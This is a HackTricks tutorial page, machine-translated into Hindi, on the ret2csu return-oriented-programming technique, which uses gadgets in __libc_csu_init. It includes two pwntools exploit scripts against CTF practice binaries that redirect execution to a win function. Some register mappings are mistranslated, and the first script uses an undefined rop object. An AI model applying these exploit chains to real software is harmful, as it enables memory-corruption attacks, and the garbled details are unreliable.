Ret2csu

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो सब्सक्रिप्शन प्लान्स देखें!
आधिकारिक PEASS और HackTricks स्वैग प्राप्त करें
हमारे विशेष NFTs कलेक्शन The PEASS Family की खोज करें
शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या हमें ट्विटर 🐦 @hacktricks_live** पर फॉलो** करें।
हैकिंग ट्रिक्स साझा करें द्वारा पीआर जमा करके HackTricks और HackTricks Cloud github repos में।

https://www.scs.stanford.edu/brop/bittau-brop.pdfमूल जानकारी

ret2csu एक हैकिंग तकनीक है जब आप किसी प्रोग्राम के नियंत्रण पर कब्जा पाने की कोशिश कर रहे हो लेकिन आपको सामान्य रूप से प्रोग्राम के व्यवहार को बदलने के लिए उपयोग किए जाने वाले गैजेट्स नहीं मिल रहे हैं।

जब एक प्रोग्राम किसी विशेष पुस्तकालय (जैसे libc) का उपयोग करता है, तो इसमें कुछ स्थापित फ़ंक्शन होते हैं जो विभिन्न प्रोग्राम के अंशों के बीच कैसे बातचीत करें को प्रबंधित करने के लिए होते हैं। इन फ़ंक्शनों में हमारे गुम होने वाले गैजेट्स के रूप में काम कर सकने वाले कुछ छुपे हुए गहने होते हैं, खासकर एक जिसे __libc_csu_init कहा जाता है।

__libc_csu_init में जादूगर गैजेट्स

__libc_csu_init में, दो इंस्ट्रक्शनों (गैजेट्स) के दो अनुक्रम हैं जिन्हें हाइलाइट किया जा सकता है:

पहला अनुक्रम हमें कई रजिस्टर्स (rbx, rbp, r12, r13, r14, r15) में मान सेट करने की अनुमति देता है। ये वे स्लॉट हैं जहां हम बाद में उपयोग करने के लिए संख्याएँ या पते संग्रहित कर सकते हैं।

pop rbx;
pop rbp;
pop r12;
pop r13;
pop r14;
pop r15;
ret;

यह गैजेट हमें इन रजिस्टरों को नियंत्रित करने की अनुमति देता है, जिन्हें हम स्टैक से बाहर निकालकर उनमें डाल सकते हैं।

दूसरी क्रमश: उन मानों का उपयोग करता है जिन्हें हमने सेट किया है ताकि हम कुछ काम कर सकें:

विशिष्ट मानों को अन्य रजिस्टर में ले जाएं, जिन्हें हम फ़ंक्शन में पैरामीटर के रूप में उपयोग करने के लिए तैयार कर सकते हैं।
r15 और rbx में मानों को जोड़कर निर्धारित स्थान पर कॉल करें, फिर rbx को 8 से गुणा करें।

mov rdx, r15;
mov rsi, r14;
mov edi, r13d;
call qword [r12 + rbx*8];

शायद आपको वहाँ लिखने के लिए कोई पता न हो और आपको एक ret इंस्ट्रक्शन की आवश्यकता हो। ध्यान दें कि दूसरा गैजेट भी एक ret में समाप्त होगा, लेकिन आपको उस तक पहुंचने के लिए कुछ शर्तों को पूरा करना होगा:

mov rdx, r15;
mov rsi, r14;
mov edi, r13d;
call qword [r12 + rbx*8];
add rbx, 0x1;
cmp rbp, rbx
jnz <func>
...
ret

शर्तें होंगी:

[r12 + rbx*8] को कॉल करने वाले फ़ंक्शन का पता होना चाहिए (अगर कोई विचार नहीं है और कोई pie नहीं है, तो आप सिर्फ _init फ़ंक्शन का उपयोग कर सकते हैं):
यदि _init 0x400560 पर है, GEF का उपयोग करके इसके लिए मेमोरी में एक पॉइंटर खोजें और [r12 + rbx*8] को पॉइंटर के साथ पता होने वाला पता बनाएं:

# Example from https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html
gef➤  search-pattern 0x400560
[+] Searching '\x60\x05\x40' in memory
[+] In '/Hackery/pod/modules/ret2_csu_dl/ropemporium_ret2csu/ret2csu'(0x400000-0x401000), permission=r-x
0x400e38 - 0x400e44  →   "\x60\x05\x40[...]"
[+] In '/Hackery/pod/modules/ret2_csu_dl/ropemporium_ret2csu/ret2csu'(0x600000-0x601000), permission=r--
0x600e38 - 0x600e44  →   "\x60\x05\x40[...]"

rbp और rbx को एक ही मान रखना चाहिए ताकि जंप से बचा जा सके
आपको ध्यान में रखने योग्य कुछ छूटे हुए pops हैं

RDI और RSI

रिट२सीएसयू गैजेट से rdi और rsi को नियंत्रित करने का एक और तरीका है उसके विशिष्ट offsets तक पहुंचकर:

अधिक जानकारी के लिए इस पेज की जाँच करें:

pageBROP - Blind Return Oriented Programming

उदाहरण

कॉल का उपयोग

सोचिए आप एक सिस्टम कॉल करना चाहते हैं या write() जैसे फ़ंक्शन को कॉल करना चाहते हैं लेकिन rdx और rsi रजिस्टर में पैरामीटर के रूप में विशिष्ट मान चाहिए। सामान्य रूप से, आप उन रजिस्टरों को सीधे सेट करने वाले गैजेट्स खोजेंगे, लेकिन आप कोई भी नहीं मिलता।

यहाँ ret2csu काम में आता है:

रजिस्टर सेट करें: पहले जादूगर गैजेट का उपयोग करें ताकि आप स्टैक से मानों को रीड करके rbx, rbp, r12 (edi), r13 (rsi), r14 (rdx), और r15 में डाल सकें।
दूसरे गैजेट का उपयोग करें: उन रजिस्टरों को सेट करके, आप दूसरे गैजेट का उपयोग करते हैं। इससे आप अपने चुने हुए मानों को rdx और rsi में ले जा सकते हैं (r14 और r13 से अनुकूलित करके), फ़ंक्शन कॉल के लिए पैरामीटर तैयार कर सकते हैं। इसके अतिरिक्त, r15 और rbx को नियंत्रित करके, आप प्रोग्राम को एक फ़ंक्शन कॉल करने के लिए पता किए गए पते पर फ़ंक्शन को कॉल करा सकते हैं और [r15 + rbx*8] में रख सकते हैं।

आपके पास इस तकनीक का उपयोग करने और इसे समझाने का उदाहरण है, और यह उसने उपयोग किया गया अंतिम उत्पीड़न है:

from pwn import *

elf = context.binary = ELF('./vuln')
p = process()

POP_CHAIN = 0x00401224 # pop r12, r13, r14, r15, ret
REG_CALL = 0x00401208  # rdx, rsi, edi, call [r15 + rbx*8]
RW_LOC = 0x00404028

rop.raw('A' * 40)
rop.gets(RW_LOC)
rop.raw(POP_CHAIN)
rop.raw(0)                      # r12
rop.raw(0)                      # r13
rop.raw(0xdeadbeefcafed00d)     # r14 - popped into RDX!
rop.raw(RW_LOC)                 # r15 - holds location of called function!
rop.raw(REG_CALL)               # all the movs, plus the call

p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win']))            # send to gets() so it's written
print(p.recvline())                        # should receive "Awesome work!"

ध्यान दें कि पिछला एक्सप्लॉइट RCE करने के लिए नहीं है, यह केवल एक फ़ंक्शन को बुलाने के लिए है जिसका नाम win है (ROP श्रृंखला में gets को कॉल करके win का पता stdin से लेते हुए और इसे r15 में स्टोर करते हुए) तीसरे तर्क के साथ जिसका मान 0xdeadbeefcafed00d है।

कॉल को छोड़कर और रिट तक पहुंचना

निम्नलिखित एक्सप्लॉइट इस पेज से निकाला गया था जहां ret2csu का उपयोग किया गया था लेकिन कॉल का उपयोग करने की बजाय, तुलनाएँ छोड़कर ret तक पहुंच रहा है:

# Code from https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html
# This exploit is based off of: https://www.rootnetsec.com/ropemporium-ret2csu/

from pwn import *

# Establish the target process
target = process('./ret2csu')
#gdb.attach(target, gdbscript = 'b *    0x4007b0')

# Our two __libc_csu_init rop gadgets
csuGadget0 = p64(0x40089a)
csuGadget1 = p64(0x400880)

# Address of ret2win and _init pointer
ret2win = p64(0x4007b1)
initPtr = p64(0x600e38)

# Padding from start of input to saved return address
payload = "0"*0x28

# Our first gadget, and the values to be popped from the stack

# Also a value of 0xf means it is a filler value
payload += csuGadget0
payload += p64(0x0) # RBX
payload += p64(0x1) # RBP
payload += initPtr # R12, will be called in `CALL qword ptr [R12 + RBX*0x8]`
payload += p64(0xf) # R13
payload += p64(0xf) # R14
payload += p64(0xdeadcafebabebeef) # R15 > soon to be RDX

# Our second gadget, and the corresponding stack values
payload += csuGadget1
payload += p64(0xf) # qword value for the ADD RSP, 0x8 adjustment
payload += p64(0xf) # RBX
payload += p64(0xf) # RBP
payload += p64(0xf) # R12
payload += p64(0xf) # R13
payload += p64(0xf) # R14
payload += p64(0xf) # R15

# Finally the address of ret2win
payload += ret2win

# Send the payload
target.sendline(payload)
target.interactive()

क्यों न केवल libc का प्रयोग करें?

सामान्यत: ये मामले ret2plt + ret2lib के लिए भी संवेदनशील होते हैं, लेकिन कभी-कभी आपको उन सभी पैरामीटरों को नियंत्रित करने की आवश्यकता होती है जो आपको libc में सीधे मिलने वाले गैजेट्स के साथ आसानी से नियंत्रित नहीं किया जा सकता है। उदाहरण के लिए, write() फ़ंक्शन को तीन पैरामीटर की आवश्यकता होती है, और इन सभी को सीधे सेट करने के लिए गैजेट्स खोजना संभव नहीं हो सकता।

PreviousBROP - Blind Return Oriented Programming NextRet2dlresolve

Last updated 20 hours ago